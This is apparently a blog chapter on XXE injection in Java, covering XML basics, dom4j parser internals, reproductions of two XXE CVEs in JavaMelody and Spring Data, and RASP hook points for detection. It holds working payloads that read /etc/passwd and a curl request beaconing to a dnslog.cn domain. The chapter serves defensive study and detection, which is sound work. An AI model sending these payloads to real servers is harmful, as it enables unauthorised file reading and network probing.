Skip to content

xml injection

1 post with the tag “xml injection”

XXE Injection Principles and Detection

XXE stands for XML External Entity Injection, where an application parses XML input and processes external entities, potentially loading malicious files. This can lead to file reading, command execution, internal network port scanning, attacks on internal websites, and denial-of-service (DoS) attacks.
This chapter first introduces the basic structure of XML and parsing tools, then explains the exploitation principles and defense strategies of XXE, and finally provides hook points and detection algorithms.

14.1 XML Basics

14.1.1 Basic Structure of XML Documents

XML documents follow specific rules and are organized into components, primarily consisting of three parts: the XML declaration, Document Type Definition (DTD, where XXE vulnerabilities reside), and document elements.

  • XML Declaration (Optional)

An XML document may begin with an XML declaration, which provides metadata about the document itself, such as version number and character encoding. For example:

<?xml version="1.0" encoding="UTF-8"?>
  • Document Type Definition (DTD)

DTD or XML Schema is used to define the valid structure, elements, attributes, and their relationships in a document. A DTD reference might look like this:

<!DOCTYPE rootElement SYSTEM "myDTD.dtd">

Or using XML Schema:

<xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema">
<!-- schema definitions go here -->
</xs:schema>
  • Element Structure

Root Element: Every XML document must have exactly one root element, which serves as the container for all other elements.

Child Elements: Elements can contain other elements as their children, forming a hierarchical structure.

Attributes: Elements can have attributes, which are name/value pairs providing additional information about the element.

Text Content: Elements can contain text content or character data (CDATA) sections.

Comments: XML documents can include comments, which do not affect document parsing.

The following XML document includes the basic structure described above:

<?xml version="1.0" encoding="UTF-8"?>
<!-- This XML document example describes a simple book catalog -->
<!DOCTYPE catalog [
<!ELEMENT catalog (book*)>
<!ELEMENT book (title, author+, year)>
<!ATTLIST book id ID #REQUIRED>
<!ELEMENT title (#PCDATA)>
<!ELEMENT author (#PCDATA)>
<!ELEMENT year (#PCDATA)>
]><catalog>
<!-- Book entry starts -->
<book id="bk101">
<title>XML Primer</title>
<author>Zhang San</author>
<author>Li Si</author>
<year>2005</year>
<description><![CDATA[This book is the perfect guide for XML beginners, covering both basic and advanced XML concepts in detail.]]></description>
</book>
<book id="bk102">
<title>Java Programming</title>
<author>Wang Wu</author>
<year>2009</year>
</book>
<!-- Book entry ends -->
</catalog>

14.1.2 XML External Entities

DTD (Document Type Definition) serves to define the legal building blocks of an XML document. A DTD can be declared internally within an XML document or referenced externally.

  • Internal Entities
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY bar "hello">
]>
<foo>&bar;</foo>
  • External Entities

External entities use the keywords SYSTEM and PUBLIC, indicating the entity originates from local or public services. Example of an external entity:

<?xml version="1.0"?>
<!DOCTYPE mage[
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<root>&file;</root>

An external entity named ‘file’ is defined in the document constraint section, which is then referenced in the document element section. The format for referencing an entity is: &entity_name;.

14.2 External Entity Parsing Source Code Analysis

14.2.1 External Entity Injection for File Reading

An xxe.xml document containing external entity injection is shown below:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY firstname SYSTEM "file:///etc/passwd" >
]>
<user>
<firstname>&firstname;</firstname>
<lastname>lastname</lastname>
</user>

Using Dom4j to parse the above XML document, the code is as follows:

import org.dom4j.Document;
import org.dom4j.Element;
import org.dom4j.io.SAXReader;
import java.io.File;```java
public class Main {
public static void main(String[] args) throws Exception {
File file = new File("src/main/resources/xxe.xml");
Document doc = new SAXReader().read(file);
Element rootElement = doc.getRootElement();
System.out.println(rootElement.element("firstname").getText());
}
}

Output:

##
# User Database
#
# Note that this file is consulted directly only when the system is running
# in single-user mode. At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
_taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
_networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
//...Output truncated due to space limitations

14.2.2 Source Code Analysis and Debugging

The complete process of dom4j reading and parsing XML documents consists of three main steps:

14.2.2.1 XML File Path Processing

The primary function of the SAXReader.read method is to obtain the absolute path of the disk XML file and set the resource path for the source object.

Figure 14-1 SAXReader Reading Disk File

Figure 14-1 SAXReader Reading Disk File

The relative path of xxe.xml is src/main/resources/xxe.xml. In line 308 of the above code, it obtains the absolute disk path of the XML file and represents the inputSource’s resource path in URL format. At line 325, it calls an overloaded version of the SAXReader.read method.

14.2.2.2 Creating XmlReader Object

2.jpgAt line 464, the getXMLReader method is called to create an XmlReader object, which is key to parsing XML documents. Let’s examine its implementation. Through debugging, we can see the critical code for creating the XMLReader as follows: 3.jpg

At line 46, an instance of SAXParserFactory is obtained, and the factory instance’s newSAXParser method is called. Since SAXParserFactory is an abstract class, let’s see how the factory class is instantiated. Its initialization code: 4.jpg

From the code, we can see the factory implementation is SAXParserFactoryImpl. Let’s examine its newSAXParser method implementation: 5.jpg

We can observe that in the newSAXParser method, a SAXParserImpl object is created, followed by calling the getXmlReader method as shown below: 6.jpg

The initialization of xmlReader occurs in the SAXParserImpl constructor. Let’s examine the constructor method of SAXParserImpl: 7.jpg

At this point, the class responsible for XML parsing is JAXPSAXParser, which is a subclass of SAXParser. Its UML class diagram is as follows:

8.jpg

14.2.2.3 XML Document Parsing

After creating the xmlReader object, the XML document reading begins. From the above UML class diagram, we can see that the actual parsing class is JAXPSAXParser, which is an inner class of SAXParserImpl. The parse method is as follows: Xnip2024-07-08_09-35-58.jpg

It actually calls its parent class’s parser method, implemented as:

Xnip2024-07-08_09-36-36.jpg

At line 1216, we can see it actually calls the parse method of the XMLParser class:

Xnip2024-07-08_09-37-21.jpg

In this method, fConfiguration is responsible for parsing XML. The class to which fConfiguration belongs is an interface called XMLParserConfiguration. The UML class diagram for this interface is as follows: Xnip2024-07-08_09-52-09.jpg

We can see that the actual parsing class is XML11Configuration, with relevant methods as follows:

Xnip2024-07-08_09-38-45.jpg

Xnip2024-07-08_09-40-00.jpg

Here it actually calls fCurrentScanner.scanDocument, where the actual document scanning begins: Xnip2024-07-08_09-57-19.jpgLooking at the next method, we can see that it parses the XML document into individual events: Xnip2024-07-08_10-44-55.jpg

Our main focus is on the parsing of entity references: Xnip2024-07-08_10-48-35.jpg

When scanning entity references, the scanEntityReference method is called. The code for this method is as follows: Xnip2024-07-08_10-57-50.jpg At line 1238, the startEntity method is called to parse the entity. Xnip2024-07-08_10-50-25.jpg Xnip2024-07-08_10-51-33.jpg The setupCurrentEntity method is responsible for parsing entity resources, implemented as follows: Xnip2024-07-08_10-52-48.jpg

At this point, the debugging of the external entity reference parsing process in XML documents is complete.

14.3 XXE Vulnerability Examples

14.3.1 CVE-2018-15531

  • Vulnerability Overview

JavaMelody is a monitoring tool for JAVA applications and application servers (Tomcat, Jboss, Weblogic) in production and QA environments. It provides monitoring data through charts, helping developers and operations teams identify performance bottlenecks and optimize responses. Version 1.74.0 fixed an XXE vulnerability with CVE ID CVE-2018-15531. Attackers could exploit this vulnerability to read sensitive information on the JavaMelody server.

  • Affected Versions

Versions < 1.74.0

  • Fix Code

Figure JavaMelody fix code commit

Commit link: https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353

  • Vulnerability Environment Setup

Create a simple Springboot project and add the specified version dependency for javamelody in pom.xml.

<dependency>
<groupId>net.bull.javamelody</groupId>
<artifactId>javamelody-spring-boot-starter</artifactId>
<version>1.73.1</version>
</dependency>

After starting the application, access the monitoring page at http://localhost:8080/monitoring. The result is as follows:

Figure JavaMelody fix code commit

  • Register a DNS domain

Domain: 4yf5lc.dnslog.cn Figure JavaMelody fix code commitThe request is sent as follows:

curl --location --request POST 'http://localhost:8080' \
--header 'Content-type: text/xml' \
--header 'SOAPAction: aaaaa' \
--data-raw '<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://www.4yf5lc.dnslog.cn">
%remote;
]>
</root>'

Alternatively, you can send the request using Postman: Figure Sending Request via Postman

  • Observe the Results

You can see that the dnslog.cn platform has recorded the server’s IP information. Figure XXE Attack Result

Partial logs intercepted by RASP are shown below: Figure XXE Attack Result

14.3.2 CVE-2018-1259

  • Vulnerability Overview

XMLBeans provides an object view of underlying XML data while allowing access to the original XML information set. When used in combination with XMLBeam 1.4.14 or earlier versions, Spring Data Commons versions 1.13 to 1.13.11 and 2.0 to 2.0.6 do not restrict XML external entity references. This allows unauthenticated remote malicious users to exploit specific parameters in Spring Data’s request binding to access arbitrary files on the system.

  • Affected Versions

Spring Data Commons 1.13 to 1.13.11
Spring Data REST 2.6 to 2.6.11
Spring Data Commons 2.0 to 2.0.6
Spring Data REST 3.0 to 3.0.6

  • Vulnerability Analysis

The vulnerability fix commit reveals modifications to the DefaultXMLFactoriesConfig file as shown below: Figure Sending Request via Postman

commit: https://github.com/SvenEwald/xmlbeam/commit/f8e943f44961c14cf1316deb56280f7878702ee1

The changes configure default features, disable entity references, and prevent merging multiple XML documents.

  • Reproduction

The code is sourced from the official spring-data-examples demo: spring-data-xml-xxe.

  • The code originates from the official spring-data-examples project, with key sections as follows:
@RestController
class UserController {
@ProjectedPayload
public interface UserPayload {
@XBRead("//firstname")
@JsonPath("$..firstname")
String getFirstname();
@XBRead("//lastname")
@JsonPath("$..lastname")
String getLastname();
}```
@PostMapping(value = "/")
HttpEntity<String> post(@RequestBody UserPayload user) {
return ResponseEntity
.ok(String.format("Received firstname: %s, lastname: %s", user.getFirstname(), user.getLastname()));
}
}

Project pom.xml dependencies:

<dependency>
<groupId>org.springframework.data</groupId>
<artifactId>spring-data-commons</artifactId>
<version>2.0.5.RELEASE</version>
</dependency>
<dependency>
<groupId>com.jayway.jsonpath</groupId>
<artifactId>json-path</artifactId>
</dependency>
<dependency>
<groupId>org.xmlbeam</groupId>
<artifactId>xmlprojector</artifactId>
<version>1.4.13</version>
</dependency>

If you are familiar with Spring Boot project creation, the above code can build a complete application. After the project is built, compile it into an executable jar package and run it:

Terminal window
mvn clean package
java -jar ./target/xxe-demo-0.0.1-SNAPSHOT.jar
  • Sending Requests

Arbitrary file reading by sending XML format payload via POST: Example:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY file SYSTEM "file:///etc/passwd" >
]>
<user><firstname>&file;</firstname><lastname>rasp</lastname></user>

Send the request using Postman as shown below: Figure Sending request with Postman

  • Observing Results

Partial logs intercepted by RASP are as follows:

Figure XXE attack results

14.4 Hook Point Selection and Detection Algorithm

14.4.1 Hook Class Selection

Although there are many XML parsing middleware, it’s sufficient to hook the XML entity parsing part. For example, both DOM4J and JAXP tools rely on apache-xerces for XML entity parsing. Relevant hook points are summarized as follows:

  • Open-source tool apache.xerces

org.apache.xerces.impl.XMLEntityManager#startEntity(String, org.apache.xerces.xni.parser.XMLInputSource, boolean, boolean)Open-source tool org.apache.xerces

  • Apache Xerces tool within JDK

com.sun.org.apache.xerces.internal.impl.XMLEntityManager#startEntity(boolean, String, com.sun.org.apache.xerces.internal.xni.parser.XMLInputSource, boolean, boolean)

Built-in apache.xerces tool in JDK

It can be observed that besides the difference in package names, there are also some variations in the parameter lists between the two hook points mentioned above.

  • Open-source tool wstx

com.ctc.wstx.sr.StreamScanner#expandEntity(com.ctc.wstx.ent.EntityDecl, boolean)

Open-source tool com.ctc.wstx

14.4.2 Detection Algorithm

XXE vulnerabilities in Java have limited exploitable protocols. All supported protocols are under the sun.net.www.protocol package. The protocols supported by JDK8 and JDK11 are as follows:

JDK11: jmod, jrt, mailto, file, ftp, http, https, jar;

JDK8: mailto, netdoc, file, ftp, http, https, jar;

The detection can be performed by obtaining the protocol name, path, and host name of external entity resources respectively. The parameter acquisition and detection are as follows:

The method to obtain parameters is shown below: Xnip2024-05-11_08-21-13.jpg

The algorithm for parameter detection is as follows: Xnip2024-07-09_08-17-48.jpg